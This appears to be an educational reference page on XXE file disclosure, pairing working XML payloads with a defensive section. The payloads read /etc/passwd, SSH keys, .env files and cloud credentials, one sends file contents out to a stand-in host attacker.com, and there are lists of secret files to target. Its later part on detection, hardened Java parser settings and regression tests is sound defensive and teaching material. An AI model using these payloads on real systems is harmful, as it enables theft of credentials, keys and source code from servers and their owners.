File Disclosure via XXE
Using XXE vulnerabilities to read arbitrary files from the server's filesystem, including sensitive configuration files, credentials, and source code.
Overview
File disclosure is one of the most common and impactful XXE exploitation techniques. By defining external entities that reference local files with the file:// URI scheme, an attacker can force the XML parser to read those files and return their contents.
Impact:
- Read application source code (credentials, API keys)
- Access configuration files (database passwords, secrets)
- Retrieve system files (/etc/passwd, /etc/shadow)
- Read deployment keys (SSH keys, certificates)
- Access application logs (session tokens, user data)
- Read cloud metadata (AWS credentials via 169.254.169.254)
Common Target Files:
- Linux: /etc/passwd, /etc/shadow, ~/.ssh/id_rsa, /proc/self/environ
- Windows: C:\windows\win.ini, C:\boot.ini, web.config, appsettings.json
- Application: .env, config.php, application.properties, database.yml
Basic File Disclosure Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>
Windows File Disclosure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Alternative Windows paths -->
<!-- file:///c:/boot.ini -->
<!-- file:///c:/windows/system32/drivers/etc/hosts -->
<!-- file:///c:/inetpub/wwwroot/web.config -->
Path Traversal Techniques
When the application restricts file paths or runs from a specific directory, use path traversal:
Relative Path Traversal:
- file://../../etc/passwd
- file://../../../windows/win.ini
- file://../../../../var/www/html/config.php
Absolute Paths: Always try absolute paths first as they're more reliable:
- Linux: file:///etc/passwd (three slashes)
- Windows: file:///c:/windows/win.ini or file://c:\windows\win.ini
UNC Paths (Windows): On Windows, UNC paths may work:
- file://\\server\share\file.txt
- Can potentially access network shares
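The slash count in the forms above matters because of how a file URI is split into an authority (host) part and a path. The sketch below uses the JDK's java.net.URI purely to illustrate that split. XML parsers use their own resolvers and may behave differently, and the class name FileUriShape is illustrative only.

```java
import java.net.URI;

// Illustrative only: shows how java.net.URI splits a file URI into
// authority and path. XML parsers may resolve system identifiers differently.
final class FileUriShape {
    // Returns "authority=<...> path=<...>" for the given URI string.
    static String describe(String uri) {
        URI parsed = URI.create(uri);
        return "authority=" + parsed.getAuthority() + " path=" + parsed.getPath();
    }

    public static void main(String[] args) {
        System.out.println(describe("file:///etc/passwd"));
        System.out.println(describe("file://../../etc/passwd"));
    }
}
```

With three slashes the authority is empty and everything after it is the path. With two slashes the first ".." is taken as the authority rather than as a directory step, which is one reason the relative forms are less reliable than absolute paths.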
Blind File Disclosure (Out-of-Band)
<?xml version="1.0" encoding="UTF-8"?>
<!-- Initial XML payload -->
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">
  %remote;
]>
<root/>

<!-- xxe.dtd on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfil;

<!-- Server receives HTTP request with file content:
GET /log?data=root:x:0:0:root:/root:/bin/bash... -->
PHP Wrapper for Binary Files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Returns base64-encoded file content:
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA...

Decode with: echo "<base64>" | base64 -d -->

<!-- Useful for binary files: -->
<!-- php://filter/convert.base64-encode/resource=/var/www/html/image.png -->
<!-- php://filter/convert.base64-encode/resource=/home/user/.ssh/id_rsa -->
Special Files and Locations
Linux Targets:
- /etc/passwd: User account information
- /etc/shadow: Hashed passwords (requires root)
- /proc/self/environ: Environment variables (may contain secrets)
- /proc/self/cmdline: Command line arguments
- /proc/net/tcp: Network connections
- ~/.bash_history: Command history
- ~/.ssh/id_rsa: SSH private key
- ~/.aws/credentials: AWS credentials
Windows Targets:
- C:\windows\win.ini: System configuration
- C:\boot.ini: Boot configuration
- C:\windows\system32\drivers\etc\hosts: DNS mappings
- C:\inetpub\wwwroot\web.config: IIS configuration
Application Files:
- .env: Environment variables (Laravel, Node.js)
- config/database.yml: Rails database config
- appsettings.json: .NET Core configuration
- application.properties: Spring Boot config
- wp-config.php: WordPress database credentials
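Cloud Metadata:
- AWS: http://169.254.169.254/latest/meta-data/
- Google: http://metadata.google.internal/computeMetadata/v1/
- Azure: http://169.254.169.254/metadata/instance
These are HTTP endpoints, so they are reached with an http:// system identifier rather than file://. The Google and Azure endpoints also expect a custom request header (Metadata-Flavor: Google and Metadata: true respectively), which a plain entity fetch generally cannot supply.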
Error-Based File Disclosure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %eval;
  %error;
]>
<root/>
Error-Based Technique Explanation
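Error-based file disclosure works when:
- The application does not display entity expansion output
- Error messages are returned to the user
- The file content appears in the error message
The technique:
- Read the target file into the %file; parameter entity
- Reference %file; inside a path that cannot exist
- The parser tries to open the invalid path, which now contains the file content
- The resulting error message includes the attempted path
- The attacker reads the file content from the error message
Note: the XML specification does not allow parameter-entity references inside markup declarations in the internal DTD subset, so conforming parsers typically accept these declarations only when they are loaded from an external DTD.
Example error: "java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash (No such file or directory)"
The file content appears as part of the path in the error.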
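Because this technique depends on parser errors reaching the client, one defensive measure is to keep exception detail in server-side logs and return a fixed message instead. The following is a minimal sketch under that assumption. The SafeXmlErrors class, the parseOrGenericError method, and the message text are hypothetical names chosen for illustration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.xml.parsers.DocumentBuilderFactory;

// Hypothetical helper: parses XML and never echoes parser error text to the caller.
final class SafeXmlErrors {
    private static final Logger LOG = Logger.getLogger(SafeXmlErrors.class.getName());
    static final String GENERIC_ERROR = "Invalid XML document";

    // Returns "ok" on success, or a fixed message on any parse failure.
    static String parseOrGenericError(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Reject any DOCTYPE so entity declarations are never processed.
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            factory.newDocumentBuilder()
                   .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return "ok";
        } catch (Exception e) {
            // Exception detail is logged server-side only; the caller sees a fixed string.
            LOG.log(Level.WARNING, "XML parse failure", e);
            return GENERIC_ERROR;
        }
    }
}
```

The caller receives the same string whatever the parser reported, so a path embedded in an exception message never reaches the response body.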
File Disclosure Limitations
XML Special Characters: Files containing XML markup characters may break parsing:
- Characters such as < and & cause XML parse errors when they appear in expanded entity content
- Binary files often contain these characters
- Solution: Use PHP wrappers (base64 encoding) or OOB exfiltration
File Size:
- Very large files may cause parser timeout/memory errors
- Some parsers limit entity expansion size
- Target specific configuration files (usually small)
File Permissions:
- Can only read files accessible to web server user
- Linux: typically www-data, apache, nginx user
- Windows: typically IIS AppPool identity
- Cannot read root-only files unless app runs as root (bad practice)
File Encoding:
- Non-UTF-8 files may cause encoding errors
- Use base64 encoding for binary files
- Some parsers reject invalid UTF-8 sequences
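Base64 output has to be decoded before it can be inspected. The following is a small sketch using the JDK's java.util.Base64. The MIME decoder is chosen on the assumption that the returned text may contain line breaks, and the class name Base64Output is illustrative.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

final class Base64Output {
    // Decodes base64 text to raw bytes. The MIME decoder ignores line breaks
    // and other characters outside the base64 alphabet.
    static byte[] decode(String encoded) {
        return Base64.getMimeDecoder().decode(encoded);
    }

    // Convenience for text files; assumes the original file was UTF-8.
    static String decodeToText(String encoded) {
        return new String(decode(encoded), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        if (args.length != 1) {
            System.err.println("usage: Base64Output <base64-text>");
            return;
        }
        System.out.println(decodeToText(args[0]));
    }
}
```

For binary files, write the result of decode to a file rather than converting it to a string.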
Detection and Mitigation
Detection Indicators:
- Code Review:
  • XML parsers without XXE protections
  • file:// URI scheme in entity definitions
  • Display of parsed XML content to users
- Runtime Detection:
  • Unexpected file access by web server process
  • File read operations during XML parsing
  • Access to sensitive files from web application
- Log Monitoring:
  • File access attempts in application logs
  • Parse errors referencing system files
  • Unusual file I/O patterns
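As a sketch of how these indicators might be checked automatically, the class below flags XML text that contains a DOCTYPE or declares an external (SYSTEM or PUBLIC) entity. The regular expression and the XxeIndicator name are assumptions made for illustration. A pattern match like this is a coarse alerting signal that can be evaded or can misfire, so it does not replace hardening the parser.

```java
import java.util.regex.Pattern;

// Hypothetical indicator check for logged or incoming XML text.
final class XxeIndicator {
    // Matches declarations such as <!ENTITY name SYSTEM ...> and
    // <!ENTITY % name PUBLIC ...>; internal entities are not matched.
    private static final Pattern EXTERNAL_ENTITY = Pattern.compile(
        "<!ENTITY\\s+(?:%\\s+)?[^\\s>]+\\s+(?:SYSTEM|PUBLIC)\\s");

    static boolean hasDoctype(String xml) {
        return xml.contains("<!DOCTYPE");
    }

    static boolean declaresExternalEntity(String xml) {
        return EXTERNAL_ENTITY.matcher(xml).find();
    }

    // True if either indicator is present.
    static boolean isSuspicious(String xml) {
        return hasDoctype(xml) || declaresExternalEntity(xml);
    }
}
```

A request filter or log processor could call isSuspicious on each XML body and raise an alert, leaving the decision to block to the parser configuration itself.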
Mitigation:
- Disable External Entities (Primary defense)
- Disable DTD Processing (Strongest protection)
- Input Validation (Reject DOCTYPE)
- Least Privilege (Limit file access permissions)
- Network Segmentation (Prevent outbound connections)
- File Access Controls (Use chroot, containers)
- Monitoring (Alert on sensitive file access)
Secure Parser Configuration
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class SecureXMLParser {
    public Document parseXML(String xmlData) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

        // STRONGEST: Completely disable DOCTYPE (prevents all XXE)
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl",
            true
        );

        // If DOCTYPE needed, disable external entities
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities",
            false
        );
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities",
            false
        );
        factory.setFeature(
            "http://apache.org/xml/features/nonvalidating/load-external-dtd",
            false
        );

        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);

        DocumentBuilder builder = factory.newDocumentBuilder();
        // Encode explicitly as UTF-8 instead of relying on the platform default charset
        return builder.parse(
            new ByteArrayInputStream(xmlData.getBytes(StandardCharsets.UTF_8)));
    }
}
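A configuration like this is worth verifying with a regression check that feeds the parser a document containing a DOCTYPE and confirms it is refused. The sketch below assumes the JDK's built-in parser, which supports the disallow-doctype-decl feature. The class and method names are hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXException;

// Hypothetical regression check for a hardened DocumentBuilderFactory.
final class SecureParserCheck {
    // Returns true if the hardened parser refuses the document, false if it parses.
    static boolean isRejected(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            factory.setXIncludeAware(false);
            factory.setExpandEntityReferences(false);
            factory.newDocumentBuilder()
                   .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            // The parser raised a fatal error, e.g. on encountering the DOCTYPE.
            return true;
        } catch (Exception e) {
            throw new IllegalStateException("Unexpected failure while parsing", e);
        }
    }

    public static void main(String[] args) {
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE root ["
            + "<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>";
        System.out.println("DOCTYPE rejected: " + isRejected(withDoctype));
        System.out.println("Plain XML rejected: " + isRejected("<root/>"));
    }
}
```

Because the DOCTYPE is refused before any entity is resolved, the check never touches the referenced file. Running it in a test suite helps catch a later change that loosens the factory settings.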